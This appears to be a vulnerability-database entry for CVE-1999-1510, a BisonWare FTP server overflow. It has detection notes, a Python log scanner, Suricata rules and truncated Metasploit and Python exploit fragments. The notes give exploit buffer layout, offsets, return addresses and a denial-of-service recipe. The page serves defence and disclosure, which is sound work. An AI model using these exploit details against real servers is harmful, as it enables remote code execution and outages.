CVE-1999-1510
Published: 1999-05-17
Priority: P342 · high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Public exploit available
EPSS: 67.09% (99.2th percentile)
Buffer overflows in Bisonware FTP server prior to 4.1 allow remote attackers to cause a denial of service, and possibly execute arbitrary commands, via long (1) USER, (2) LIST, or (3) CWD commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bisonware | bisonware_ftp_server | <= 4.1 | — |
Detection & IOCs (extracted from sources)
- Detect buffer overflow attempts against BisonFTP via oversized USER or PASS commands: strings exceeding 550 characters in USER/PASS FTP commands indicate an exploitation attempt.
- Detect buffer overflow attempts via oversized LIST or CWD FTP commands: strings longer than 1500 characters in LIST or CWD arguments indicate an exploitation attempt.
- Metasploit module exploit buffer structure: 1028 random alpha bytes + 16 NOP bytes + encoded payload + NOP padding + return address 0x0040333f + 39 random alpha bytes, sent to BisonFTP on the default FTP port.
- Detect a PORT command followed by large amounts of carriage returns and newlines as a DoS vector against BisonFTP.
- Bad characters for payload encoding are null byte, line feed, and carriage return; their absence in a large FTP command argument may indicate a crafted exploit buffer.
- The return address 0x0040333f (call edx in Bisonftp.exe) is specific to the Windows XP SP3 English target; the alternate return address 0x7e3c5c9a (jmp edx in shell32.dll) targets Windows XP SP3 Spanish. Exploits will fail against other OS versions/languages.
- Payload space is constrained to 388 bytes with bad characters \x00, \x0a, \x0d excluded; shellcodes containing these bytes will not function.
- The overflow offset for the Metasploit module is 1432 bytes for Windows XP SP3 EN; the standalone Python PoC uses a 1092-byte NOP sled, suggesting a different effective offset calculation.
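The length indicators listed above can be applied offline to a captured client-to-server FTP control stream. The following is an added example, not code from any of the indexed sources; `scan_ftp_commands`, `Finding`, the `PORT_BLANK_LINES` value and the sample traffic are hypothetical and constructed for illustration.

```python
# Added example: thresholds come from the detection notes above; the
# PORT newline threshold and all sample traffic are constructed assumptions.
from dataclasses import dataclass

# Argument lengths (characters) the page cites as exploitation indicators.
HIGH_THRESHOLDS = {"USER": 550, "PASS": 550, "LIST": 1500, "CWD": 1500}
GENERIC_THRESHOLD = 100   # length used by the two Suricata rules on this page
PORT_BLANK_LINES = 1000   # assumption: stand-in for "several thousand" CR/LFs

@dataclass
class Finding:
    line_no: int
    verb: str
    arg_len: int   # argument length, or blank-line count for PORT floods
    severity: str  # "high" (page threshold) or "medium" (generic rule length)

def scan_ftp_commands(raw: bytes) -> list[Finding]:
    """Scan a client-to-server FTP control stream for oversized arguments."""
    findings, blank_run, after_port = [], 0, False
    for line_no, line in enumerate(raw.split(b"\n"), start=1):
        line = line.rstrip(b"\r")
        if not line:
            blank_run += 1
            # Report a PORT-then-newline flood once, when the run hits the limit.
            if after_port and blank_run == PORT_BLANK_LINES:
                findings.append(Finding(line_no, "PORT", blank_run, "high"))
            continue
        blank_run = 0
        verb, _, arg = line.partition(b" ")
        verb_s = verb.decode("ascii", "replace").upper()
        after_port = verb_s == "PORT"
        limit = HIGH_THRESHOLDS.get(verb_s)
        if limit is None:
            continue
        if len(arg) > limit:
            findings.append(Finding(line_no, verb_s, len(arg), "high"))
        elif len(arg) >= GENERIC_THRESHOLD:
            findings.append(Finding(line_no, verb_s, len(arg), "medium"))
    return findings

# Constructed sample: three benign commands, then oversized arguments and a
# PORT command followed by a run of empty lines.
SAMPLE = (b"USER anonymous\r\nPASS guest@example.test\r\nCWD /pub\r\n"
          b"USER " + b"A" * 600 + b"\r\n"
          b"CWD " + b"B" * 120 + b"\r\n"
          b"LIST " + b"C" * 1600 + b"\r\n"
          b"PORT a\r\n" + b"\r\n" * 3000)
```

The "medium" tier mirrors the 100-character length in the Suricata rules and will also fire on long but legitimate paths, so it is better suited to triage than to blocking.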
Suricata
GPL FTP USER overflow attempt
suricata·2010-09-23
CVE-1999-1510 GPL FTP USER overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP USER overflow attempt"; flow:established,to_server,no_stream; content:"USER|20|"; nocase; isdataat:100,relative; pcre:"/^USER\x20[^\x00\x20\x0a\x0d]{100}/smi"; reference:bugtraq,10078; reference:bugtraq,1227; reference:bugtraq,1504; reference:bugtraq,1690; reference:bugtraq,4638; reference:bugtraq,7307; reference:bugtraq,8376; reference:cve,1999-1510; reference:cve,1999-1514; reference:cve,1999-1519; reference:cve,1999-1539; reference:cve,2000-0479; reference:cve,2000-0656; reference:cve,2000-0761; reference:cve,2000-0943; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0256; reference:cve,2001-0794; reference:cve,2001-0826; reference:cve,2002-0126; reference:cve,2002-1522;
Suricata
GPL FTP CWD overflow attempt
suricata·2010-09-23
CVE-1999-0219 GPL FTP CWD overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP CWD overflow attempt"; flow:established,to_server; content:"CWD"; nocase; isdataat:100,relative; pcre:"/^CWD\s[^\n]{100}/smi"; reference:bugtraq,11069; reference:bugtraq,1227; reference:bugtraq,1690; reference:bugtraq,6869; reference:bugtraq,7251; reference:bugtraq,7950; reference:cve,1999-0219; reference:cve,1999-1058; reference:cve,1999-1510; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0781; reference:cve,2002-0126; reference:cve,2002-0405; classtype:attempted-admin; sid:2101919; rev:25; metadata:created_at 2010_09_23, cve CVE_1999_0219, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
exploitdb·2011-09-09
CVE-1999-1510 BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
---
##############################################################################
#
# Title : BisonFTP Server Remote Buffer Overflow Exploit
# Author : Veerendra G.G SecPod Technologies (www.secpod.com)
# Advisory : http://secpod.org/blog/?p=384
# http://secpod.org/msf/bison_server_bof.rb
# Version : BisonFTP Server 'BisonFTP Server Remote Buffer Overflow Vulnerability',
'Description' => %q{
This module exploits a buffer overflow vulnerability
found in the BisonFTP Server
[
'localh0t', # Initial PoC
'veerendragg @ SecPod', # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1.0 $',
'References' =>
[
[ 'BID', '49109'],
[ 'CVE', '1999-1510'],
[ 'URL', 'http://secpod.org/blog/?p=384'],
[ 'URL', 'http:
Exploit-DB
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
exploitdb·2011-08-10
CVE-1999-1510 BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
---
#!/usr/bin/python
# BisonFTP Server \n" %(sys.argv[0])
sys.exit()
print "\n[!] Connecting to %s ..." %(sys.argv[1])
# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)
# padding
buffer = "\x90" * 1092
# 368 bytes shellcode
Exploit-DB
BisonWare BisonFTP Server 3.5 - Multiple Vulnerabilities
exploitdb·1999-05-17
CVE-1999-1510 BisonWare BisonFTP Server 3.5 - Multiple Vulnerabilities
---
// source: https://www.securityfocus.com/bid/271/info
Multiple vulnerabilities in the BisonWare FTP Server can cause denials of service.
The vulnerabilities are:
The server fails to close the socket created by a PASV command if multiple PASV commands are executed back to back. This can create a socket and memory shortage that will not be fixed when the client disconnects from the server.
Connecting to the server and issuing a "PORT a" command followed by several thousand carriage returns and new lines will cause the server to crash.
There are multiple buffer overflows in all commands that take arguments. For example, LIST and CWD both crash the server if they are passed a string longer than 1500 characters.
The USER command in
Metasploit
BisonWare BisonFTP Server Buffer Overflow
metasploit
BisonWare BisonFTP Server 3.5 is prone to an overflow condition. This module exploits a buffer overflow vulnerability in the said application.
No writeups or analysis indexed.